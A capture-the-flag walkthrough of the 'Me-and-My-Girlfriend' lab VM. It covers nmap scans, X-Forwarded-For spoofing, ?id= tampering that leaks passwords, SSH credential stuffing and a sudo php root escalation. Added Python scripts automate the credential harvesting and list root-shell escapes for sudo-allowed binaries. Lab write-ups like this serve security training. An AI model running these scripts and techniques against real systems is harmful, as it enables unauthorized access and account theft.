Boot-to-root walkthrough: Me-and-My-Girlfriend

1. Information gathering

The nmap output, straight from the scan:

# Nmap 7.94 scan initiated Wed Aug  2 08:21:07 2023 as: nmap -sT -sC -sV -O -A -p22,80 -o nmap_details.txt 192.168.56.115
Nmap scan report for 192.168.56.115
Host is up (0.0011s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 57:e1:56:58:46:04:33:56:3d:c3:4b:a7:93:ee:23:16 (DSA)
|   2048 3b:26:4d:e4:a0:3b:f8:75:d9:6e:15:55:82:8c:71:97 (RSA)
|   256 8f:48:97:9b:55:11:5b:f1:6c:1d:b3:4a:bc:36:bd:b0 (ECDSA)
|_  256 d0:c3:02:a1:c4:c2:a8:ac:3b:84:ae:8f:e5:79:66:76 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 08:00:27:53:17:B2 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
# nmap --script=vuln -p22,80 192.168.56.115 -o nmap_vuln.txt 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-02 08:21 EDT
Stats: 0:02:10 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.52% done; ETC: 08:23 (0:00:02 remaining)
Nmap scan report for 192.168.56.115
Host is up (0.00076s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-enum: 
|   /robots.txt: Robots file
|   /config/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
|_  /misc/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'

Ordering the attack: SSH on 22 is not a starting point, since without credentials there is nothing to do with it; we keep it in reserve for a credential attack once usernames and passwords have been gathered from somewhere else. That leaves the web server on 80 as the only real surface, and http-enum has already pointed at robots.txt and two directories with listings enabled, /config/ and /misc/, so we go straight to web exploitation.

2. Web exploitation

$ curl -i -L http://192.168.56.115/
HTTP/1.1 200 OK
Date: Wed, 02 Aug 2023 12:23:59 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Vary: Accept-Encoding
Content-Length: 120
Content-Type: text/html

Who are you? Hacker? Sorry This Site Can Only Be Accessed local!<!-- Maybe you can search how to use x-forwarded-for -->

The HTML comment gives it away: this is another box with a strong CTF flavour. The hint implies that the "local only" check is based on a request header rather than on the actual TCP peer address.

A quick gobuster directory brute-force:

$ gobuster dir -u http://192.168.56.115 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php
/.html                (Status: 403) [Size: 286]
/index.php            (Status: 200) [Size: 120]
/.php                 (Status: 403) [Size: 285]
/misc                 (Status: 301) [Size: 314] [--> http://192.168.56.115/misc/]
/config               (Status: 301) [Size: 316] [--> http://192.168.56.115/config/]
/robots.txt           (Status: 200) [Size: 32]

The comment says "Maybe you can search how to use x-forwarded-for".

Background reading on the header: HTTP X-Forwarded-For 介绍 | 菜鸟教程 (runoob.com), https://www.runoob.com/w3cnote/http-x-forwarded-for.html

So we spoof it. X-Forwarded-For is a client-supplied header that proxies use to pass along the original client IP; an application that trusts it without a proxy in front can be told any address, including a loopback one.

Start Burp Suite and add a Proxy match-and-replace rule (the screenshot of the rule is not reproduced here) that inserts an X-Forwarded-For header carrying a local address into every request. That gives a simple, realistic spoof without editing each request by hand.

Open Burp's built-in browser.

There was a small hiccup at this point, so the target's IP address changes from here on; it does not affect anything.

Register an account and log in.

The URL after login contains "?id=", which is worth a simple tampering attempt: change the id and see whether the page serves another user's record (an insecure direct object reference), or whether the parameter is injectable.

It worked straight away.

The lesson here is to develop a sensitivity to parameters like "?id=" in CTF-style boxes; they are the classic place to test for injection and object-reference bugs.

The page source of the returned profile contains usernames and passwords that are not shown in the rendered page.

We now hold some sensitive information.
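The two web steps above, spoofing X-Forwarded-For and walking the ?id= parameter to harvest credentials from the page source, as an added Python example that is not part of the original writeup and replaces the Burp rule with a script. The profile URL template, the header value 127.0.0.1 and the form field names username/password are my assumptions (the page only shows "?id=" and the header name); the sample HTML is constructed, and the output is written as user:pass lines ready for the credential attack on SSH.

```python
"""Added example: X-Forwarded-For spoof plus ?id= enumeration (not the writeup's code)."""
import urllib.request
from html.parser import HTMLParser

# Assumption: a loopback address satisfies the server's "local only" check.
SPOOF_HEADERS = {"X-Forwarded-For": "127.0.0.1"}
# Taken from the curl response on the page; used to detect a rejected spoof.
BLOCK_MARKER = "Can Only Be Accessed local"
# Assumed URL layout for the profile page; the writeup only shows "?id=".
PROFILE_URL = "http://192.168.56.115/index.php?page=profile&id={id}"

# Constructed sample of what a leaked profile page might look like (not captured from the box).
SAMPLE_PROFILE_HTML = """
<form method="post">
  <input type="text" name="username" value="alice">
  <input type="password" name="password" value="4lic3">
  <input type="submit" value="Update">
</form>
"""


class InputFieldParser(HTMLParser):
    """Collect (name, type, value) of every <input> in a page."""

    def __init__(self):
        super().__init__()
        self.fields = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "input":
            a = {k.lower(): (v or "") for k, v in attrs}
            self.fields.append((a.get("name", ""), a.get("type", "text").lower(), a.get("value", "")))


def extract_credentials(html):
    """Return (username, password) when the page embeds a filled-in password field, else None.

    Assumption: the login name sits in a text field named username/user/name/login
    and the secret in any <input type="password"> that carries a value attribute."""
    parser = InputFieldParser()
    parser.feed(html)
    password = next((v for _, t, v in parser.fields if t == "password" and v), None)
    username = next((v for n, t, v in parser.fields
                     if t == "text" and v and n.lower() in ("username", "user", "name", "login")), None)
    if username and password:
        return username, password
    return None


def is_blocked(body):
    """True when the server still answered with its 'local only' refusal."""
    return BLOCK_MARKER in body


def fetch(url, cookie=None, spoof=True, timeout=5):
    """GET url with the spoofed header (and the logged-in session cookie, if given)."""
    headers = dict(SPOOF_HEADERS) if spoof else {}
    if cookie:
        headers["Cookie"] = cookie
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def harvest(ids, cookie):
    """Walk ?id=N for each id and keep the ids whose page leaks a credential."""
    found = {}
    for i in ids:
        body = fetch(PROFILE_URL.format(id=i), cookie=cookie)
        if is_blocked(body):
            raise RuntimeError("X-Forwarded-For spoof rejected; try another local address")
        cred = extract_credentials(body)
        if cred:
            found[i] = cred
    return found


def combo_lines(creds):
    """user:pass lines in the format hydra -C and crackmapexec's paired mode consume."""
    return [f"{u}:{p}" for u, p in creds.values()]


if __name__ == "__main__":
    import sys
    # Usage: python harvest.py "PHPSESSID=..."  (cookie of the account you registered)
    session_cookie = sys.argv[1] if len(sys.argv) > 1 else None
    print("\n".join(combo_lines(harvest(range(1, 11), session_cookie))))
```

The session cookie of the account you registered is passed on the command line because the profile page is only served to a logged-in user; the id range is a guess to widen until the pages stop returning credentials.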

3. SSH brute force

First, a word on why we brute-force at all.

The site offers no file upload or similar interaction point; it is a very simple site. Through its weaknesses we obtained some sensitive information, and credentials harvested from one service are usually worth trying elsewhere, so SSH on 22 is the obvious next target.

I saved the pairs one by one and then used them all together; you can do this by hand or with a script, but the number of users is genuinely small.

Try the harvested pairs against SSH (credential stuffing rather than a blind brute force):

$ crackmapexec ssh 192.168.43.75 -u username -p password --continue-on-success
SSH         192.168.43.75   22     192.168.43.75    [+] alice:4lic3

Success: alice:4lic3 is valid.

alice@gfriEND:~$ ls -liah
total 32K
 21088 drwxr-xr-x 4 alice alice 4.0K Dec 13  2019 .
    12 drwxr-xr-x 6 root  root  4.0K Dec 13  2019 ..
 21128 -rw------- 1 alice alice  154 Aug  2 21:01 .bash_history
 21090 -rw-r--r-- 1 alice alice  220 Dec 13  2019 .bash_logout
 21089 -rw-r--r-- 1 alice alice 3.6K Dec 13  2019 .bashrc
 21126 drwx------ 2 alice alice 4.0K Dec 13  2019 .cache
142082 drwxrwxr-x 2 alice alice 4.0K Dec 13  2019 .my_secret
 21091 -rw-r--r-- 1 alice alice  675 Dec 13  2019 .profile

Inside .my_secret there is a flag and a notes file.

alice@gfriEND:~/.my_secret$ cat flag1.txt  my_notes.txt 
Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!

Now your last job is get access to the root and read the flag ^_^

Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
Woahhh! I like this company, I hope that here i get a better partner than bob ^_^, hopefully Bob doesn't know my notes

Check what sudo allows.

alice@gfriEND:/home$ sudo -l
Matching Defaults entries for alice on gfriEND:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on gfriEND:
    (root) NOPASSWD: /usr/bin/php

php may be run as root without a password; since php -r can call system(), this is a one-liner to a root shell.

alice@gfriEND:/home$ sudo php -r 'system("/bin/bash");'
root@gfriEND:/home# id
uid=0(root) gid=0(root) groups=0(root)
root@gfriEND:/root# cat flag2.txt 

  ________        __    ___________.__             ___________.__                ._.
 /  _____/  _____/  |_  \__    ___/|  |__   ____   \_   _____/|  | _____     ____| |
/   \  ___ /  _ \   __\   |    |   |  |  \_/ __ \   |    __)  |  | \__  \   / ___\ |
\    \_\  (  <_> )  |     |    |   |   Y  \  ___/   |     \   |  |__/ __ \_/ /_/  >|
 \______  /\____/|__|     |____|   |___|  /\___  >  \___  /   |____(____  /\___  /__
        \/                              \/     \/       \/              \//_____/ \/

Yeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :)

Contact me if you want to contribute / give me feedback / share your writeup!
Twitter: @makegreatagain_
Instagram: @aldodimas73

Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
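The sudo -l check above generalised into a small triage routine, as an added Python example that is not part of the original writeup: it parses sudo -l output, keeps the entries that run as root, and maps the allowed binary to a known shell escape, so the php case on this box and the usual interpreter cases are caught in one pass. The sample input is the sudo -l text captured above; the escape table is mine and covers only commands I am certain of.

```python
"""Added example: flag sudo -l entries that give a root shell (not the writeup's code)."""
import os
import re

# sudo -l output captured in the walkthrough (raw string keeps the backslashes as printed).
SAMPLE_SUDO_L = r"""Matching Defaults entries for alice on gfriEND:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on gfriEND:
    (root) NOPASSWD: /usr/bin/php
"""

# Shell escapes per binary name; {bin} is replaced with the exact path from sudoers,
# because sudo matches the rule on that path. These are the standard GTFOBins-style one-liners.
ESCAPES = {
    "ALL":    "sudo /bin/bash",
    "php":    "sudo {bin} -r 'system(\"/bin/bash\");'",
    "python": "sudo {bin} -c 'import os; os.system(\"/bin/bash\")'",
    "perl":   "sudo {bin} -e 'exec \"/bin/bash\";'",
    "vim":    "sudo {bin} -c ':!/bin/bash'",
    "find":   "sudo {bin} . -exec /bin/bash \\; -quit",
    "awk":    "sudo {bin} 'BEGIN {{system(\"/bin/bash\")}}'",
    "env":    "sudo {bin} /bin/bash",
}

# One command line of sudo -l: "(runas) [TAG: ...] cmd1, cmd2"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")


def parse_sudo_l(text):
    """Return (runas_user, nopasswd, command) tuples from sudo -l output."""
    entries = []
    in_commands = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()  # "(root : root)" -> root
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in m.group("cmds").split(", "):
            entries.append((runas, nopasswd, cmd.strip()))
    return entries


def binary_name(cmd):
    """'/usr/bin/python3.8 -c ...' -> 'python'; version suffixes are stripped."""
    name = os.path.basename(cmd.split()[0])
    return re.sub(r"[\d.]+$", "", name)


def triage(text):
    """Entries runnable as root whose binary has a known shell escape."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_l(text):
        if runas not in ("root", "ALL"):
            continue
        template = ESCAPES.get(binary_name(cmd))
        if template is None:
            continue
        findings.append({
            "command": cmd,
            "nopasswd": nopasswd,
            # A rule that pins arguments (e.g. "/usr/bin/find /tmp") blocks extra
            # flags, so the escape below only applies verbatim to bare binaries.
            "args_pinned": " " in cmd and cmd != "ALL",
            "escape": template.format(bin=cmd.split()[0]),
        })
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_SUDO_L):
        print(f"{f['command']}  nopasswd={f['nopasswd']}  ->  {f['escape']}")
```

Feed it `sudo -l` output from the box (`sudo -l | python triage.py` after replacing SAMPLE_SUDO_L with stdin) and it reports the php entry with its escape; on this box the resulting command is the same `sudo php -r 'system("/bin/bash");'` used above, just with the full path.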

That's it for this box. The tool used for the credential attack, crackmapexec, is very widely used and goes far deeper than what is shown here; it is worth learning, and I may write a dedicated article on it.

 

 

 
